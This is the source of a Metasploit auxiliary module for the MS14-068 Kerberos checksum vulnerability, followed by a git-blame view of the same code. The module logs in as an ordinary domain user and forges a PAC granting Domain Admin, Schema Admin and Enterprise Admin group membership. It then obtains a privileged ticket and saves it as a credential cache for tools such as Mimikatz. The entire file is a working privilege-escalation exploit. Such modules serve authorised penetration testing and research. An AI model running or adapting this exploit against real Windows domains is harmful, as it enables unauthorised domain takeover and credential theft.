metasploit-framework/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit4 < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Kerberos::Client

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS14-068 Microsfot Kerberos Checksum Validation Vulnerability',
      'Description' => %q{
        This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem
        exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS
        request, allowing a domain user to forge a PAC with arbitrary privileges, including Domain
        Administrator. This module outputs a MIT Kerberos Credential Cache with the privileged
        ticket, which can be imported, for example, on Mimikatz. It has been tested successfully on
        Windows 2008.
      },
      'Author' =>
        [
          'Tom Maddock', # Vulnerability discovery
          'Sylvain Monne', # pykek framework and exploit
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2014-6324'],
          ['MSB', 'MS14-068'],
          ['OSVDB', '114751'],
          ['URL', 'http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx'],
          ['URL', 'https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/'],
          ['URL', 'https://github.com/bidord/pykek']
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Nov 18 2014'
    ))

    register_options(
      [
        OptString.new('USER', [ true, 'The Domain User', 'juan']),
        OptString.new('PASSWORD', [ true, 'The Domain User password', 'juan']),
        OptString.new('DOMAIN', [ true, 'The Domain Ex: DEMO.LOCAL', 'DEMO.LOCAL']),
        OptString.new('DOMAIN_SID', [ true, 'The Domain SID Ex: S-1-5-21-1755879683-3641577184-3486455962', 'S-1-5-21-1755879683-3641577184-3486455962'])
      ], self.class)
  end

  def run
    print_status("#{peer} - Connecting with the KDC...")
    connect

    unicode_password = Rex::Text.to_unicode(datastore['PASSWORD'])
    password_digest = OpenSSL::Digest.digest('MD4', unicode_password)

    pre_auth = []
    pre_auth << build_as_pa_time_stamp(key: password_digest, etype: Rex::Proto::Kerberos::Crypto::RC4_HMAC)
    pre_auth << build_pa_pac_request
    pre_auth

    print_status("#{peer} - Sending AS-REQ...")
    res = send_request_as(
      client_name: "#{datastore['USER']}",
      server_name: "krbtgt/#{datastore['DOMAIN']}",
      realm: "#{datastore['DOMAIN']}",
      key: password_digest,
      pa_data: pre_auth
    )

    unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
      print_error("#{peer} - Invalid AS-REP, aborting...")
      return
    end

    print_status("#{peer} - Parsing AS-REP...")

    session_key = extract_session_key(res, password_digest)
    logon_time = extract_logon_time(res, password_digest)
    ticket = res.ticket

    pre_auth = []
    pre_auth << build_pa_pac_request

    groups = [
      513, # DOMAIN_USERS
      512, # DOMAIN_ADMINS
      520, # GROUP_POLICY_CREATOR_OWNERS
      518, # SCHEMA_ADMINISTRATORS
      519  # ENTERPRISE_ADMINS
    ]

    pac = build_pac(
      client_name: datastore['USER'],
      group_ids: groups,
      domain_id: datastore['DOMAIN_SID'],
      realm: datastore['DOMAIN'],
      logon_time: logon_time,
      checksum_type: Rex::Proto::Kerberos::Crypto::RSA_MD5
    )

    auth_data = build_pac_authorization_data(pac: pac)
    sub_key = build_subkey(subkey_type: Rex::Proto::Kerberos::Crypto::RC4_HMAC)

    print_status("#{peer} - Sending TGS-REQ...")

    res = send_request_tgs(
      client_name: datastore['USER'],
      server_name: "krbtgt/#{datastore['DOMAIN']}",
      realm: datastore['DOMAIN'],
      session_key: session_key,
      ticket: ticket,
      auth_data: auth_data,
      pa_data: pre_auth,
      subkey: sub_key
    )

    unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
      print_error("#{peer} - Invalid TGS-REP, aborting...")
      return
    end

    print_good("#{peer} - Valid TGS-Response, extracting credentials...")

    cache = extract_kerb_creds(res, sub_key.value)

    path = store_loot('windows.kerberos', 'application/octet-stream', rhost, cache.encode)
    print_good("#{peer} - MIT Credential Cache saved on #{path}")
  end
end
Add dummy test module 2014-12-18 01:57:10 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit4 < Msf::Auxiliary`

Use random subkey 2014-12-22 21:39:08 +00:00			`include Msf::Auxiliary::Report`
Add initial specs for Msf::Kerberos::Client::TgsResponse 2014-12-21 02:29:00 +00:00			`include Msf::Kerberos::Client`
Add dummy test module 2014-12-18 01:57:10 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
Clean module code 2014-12-22 20:29:02 +00:00			`'Name' => 'MS14-068 Microsfot Kerberos Checksum Validation Vulnerability',`
Add dummy test module 2014-12-18 01:57:10 +00:00			`'Description' => %q{`
Clean module code 2014-12-22 20:29:02 +00:00			`This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem`
			`exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS`
			`request, allowing a domain user to forge a PAC with arbitrary privileges, including Domain`
			`Administrator. This module outputs a MIT Kerberos Credential Cache with the privileged`
			`ticket, which can be imported, for example, on Mimikatz. It has been tested successfully on`
			`Windows 2008.`
Add dummy test module 2014-12-18 01:57:10 +00:00			`},`
			`'Author' =>`
			`[`
Add references and authors 2014-12-22 18:34:31 +00:00			`'Tom Maddock', # Vulnerability discovery`
			`'Sylvain Monne', # pykek framework and exploit`
Clean module code 2014-12-22 20:29:02 +00:00			`'juan vazquez' # Metasploit module`
Add dummy test module 2014-12-18 01:57:10 +00:00			`],`
			`'References' =>`
			`[`
Change module filename 2014-12-22 18:29:28 +00:00			`['CVE', '2014-6324'],`
			`['MSB', 'MS14-068'],`
Add references and authors 2014-12-22 18:34:31 +00:00			`['OSVDB', '114751'],`
			`['URL', 'http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx'],`
			`['URL', 'https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/'],`
			`['URL', 'https://github.com/bidord/pykek']`
Add dummy test module 2014-12-18 01:57:10 +00:00			`],`
			`'License' => MSF_LICENSE,`
Add references and authors 2014-12-22 18:34:31 +00:00			`'DisclosureDate' => 'Nov 18 2014'`
Add dummy test module 2014-12-18 01:57:10 +00:00			`))`
Clean module code 2014-12-22 20:29:02 +00:00
			`register_options(`
			`[`
			`OptString.new('USER', [ true, 'The Domain User', 'juan']),`
			`OptString.new('PASSWORD', [ true, 'The Domain User password', 'juan']),`
			`OptString.new('DOMAIN', [ true, 'The Domain Ex: DEMO.LOCAL', 'DEMO.LOCAL']),`
			`OptString.new('DOMAIN_SID', [ true, 'The Domain SID Ex: S-1-5-21-1755879683-3641577184-3486455962', 'S-1-5-21-1755879683-3641577184-3486455962'])`
			`], self.class)`
Add dummy test module 2014-12-18 01:57:10 +00:00			`end`

			`def run`
Clean module code 2014-12-22 20:29:02 +00:00			`print_status("#{peer} - Connecting with the KDC...")`
Use random subkey 2014-12-22 21:39:08 +00:00			`connect`
Build pre auth array out of the mixin 2014-12-20 00:10:14 +00:00
Clean module code 2014-12-22 20:29:02 +00:00			`unicode_password = Rex::Text.to_unicode(datastore['PASSWORD'])`
			`password_digest = OpenSSL::Digest.digest('MD4', unicode_password)`
Use options by call 2014-12-20 00:23:11 +00:00
Build pre auth array out of the mixin 2014-12-20 00:10:14 +00:00			`pre_auth = []`
Use explicit encryption algorithms 2014-12-22 21:51:17 +00:00			`pre_auth << build_as_pa_time_stamp(key: password_digest, etype: Rex::Proto::Kerberos::Crypto::RC4_HMAC)`
Use options by call 2014-12-20 00:23:11 +00:00			`pre_auth << build_pa_pac_request`
Build pre auth array out of the mixin 2014-12-20 00:10:14 +00:00			`pre_auth`

Clean module code 2014-12-22 20:29:02 +00:00			`print_status("#{peer} - Sending AS-REQ...")`
Use options by call 2014-12-20 00:23:11 +00:00			`res = send_request_as(`
Clean module code 2014-12-22 20:29:02 +00:00			`client_name: "#{datastore['USER']}",`
			`server_name: "krbtgt/#{datastore['DOMAIN']}",`
			`realm: "#{datastore['DOMAIN']}",`
			`key: password_digest,`
Use options by call 2014-12-20 00:23:11 +00:00			`pa_data: pre_auth`
			`)`
Add dummy test module 2014-12-18 01:57:10 +00:00
Clean module code 2014-12-22 20:29:02 +00:00			`unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP`
			`print_error("#{peer} - Invalid AS-REP, aborting...")`
Add dummy test module 2014-12-18 01:57:10 +00:00			`return`
			`end`

Clean module code 2014-12-22 20:29:02 +00:00			`print_status("#{peer} - Parsing AS-REP...")`
Add dummy test module 2014-12-18 01:57:10 +00:00
Clean module code 2014-12-22 20:29:02 +00:00			`session_key = extract_session_key(res, password_digest)`
			`logon_time = extract_logon_time(res, password_digest)`
Add dummy test module 2014-12-18 01:57:10 +00:00			`ticket = res.ticket`

Create build_subkey method 2014-12-20 01:46:50 +00:00			`pre_auth = []`
			`pre_auth << build_pa_pac_request`

Clean module code 2014-12-22 20:29:02 +00:00			`groups = [`
			`513, # DOMAIN_USERS`
			`512, # DOMAIN_ADMINS`
			`520, # GROUP_POLICY_CREATOR_OWNERS`
			`518, # SCHEMA_ADMINISTRATORS`
			`519 # ENTERPRISE_ADMINS`
			`]`

Build PAC extensions from the module 2014-12-20 00:47:41 +00:00			`pac = build_pac(`
Clean module code 2014-12-22 20:29:02 +00:00			`client_name: datastore['USER'],`
			`group_ids: groups,`
			`domain_id: datastore['DOMAIN_SID'],`
			`realm: datastore['DOMAIN'],`
Build PAC extensions from the module 2014-12-20 00:47:41 +00:00			`logon_time: logon_time,`
Use explicit encryption algorithms 2014-12-22 21:51:17 +00:00			`checksum_type: Rex::Proto::Kerberos::Crypto::RSA_MD5`
Build PAC extensions from the module 2014-12-20 00:47:41 +00:00			`)`

Add specs for Msf::Kerberos::Client::Pac 2014-12-21 23:49:36 +00:00			`auth_data = build_pac_authorization_data(pac: pac)`
Use random subkey 2014-12-22 21:39:08 +00:00			`sub_key = build_subkey(subkey_type: Rex::Proto::Kerberos::Crypto::RC4_HMAC)`
Build AuthorizationData from the module 2014-12-20 00:58:06 +00:00
Clean module code 2014-12-22 20:29:02 +00:00			`print_status("#{peer} - Sending TGS-REQ...")`

Use options by call 2014-12-20 00:23:11 +00:00			`res = send_request_tgs(`
Clean module code 2014-12-22 20:29:02 +00:00			`client_name: datastore['USER'],`
			`server_name: "krbtgt/#{datastore['DOMAIN']}",`
			`realm: datastore['DOMAIN'],`
Add dummy test module 2014-12-18 01:57:10 +00:00			`session_key: session_key,`
			`ticket: ticket,`
Create build_subkey method 2014-12-20 01:46:50 +00:00			`auth_data: auth_data,`
Use random subkey 2014-12-22 21:39:08 +00:00			`pa_data: pre_auth,`
			`subkey: sub_key`
Add dummy test module 2014-12-18 01:57:10 +00:00			`)`

Clean module code 2014-12-22 20:29:02 +00:00			`unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP`
			`print_error("#{peer} - Invalid TGS-REP, aborting...")`
Add dummy test module 2014-12-18 01:57:10 +00:00			`return`
			`end`

Clean module code 2014-12-22 20:29:02 +00:00			`print_good("#{peer} - Valid TGS-Response, extracting credentials...")`
Add dummy test module 2014-12-18 01:57:10 +00:00
Use random subkey 2014-12-22 21:39:08 +00:00			`cache = extract_kerb_creds(res, sub_key.value)`
Add support for cache credentials in the mixin 2014-12-18 22:31:46 +00:00
Use random subkey 2014-12-22 21:39:08 +00:00			`path = store_loot('windows.kerberos', 'application/octet-stream', rhost, cache.encode)`
			`print_good("#{peer} - MIT Credential Cache saved on #{path}")`
Add dummy test module 2014-12-18 01:57:10 +00:00			`end`
			`end`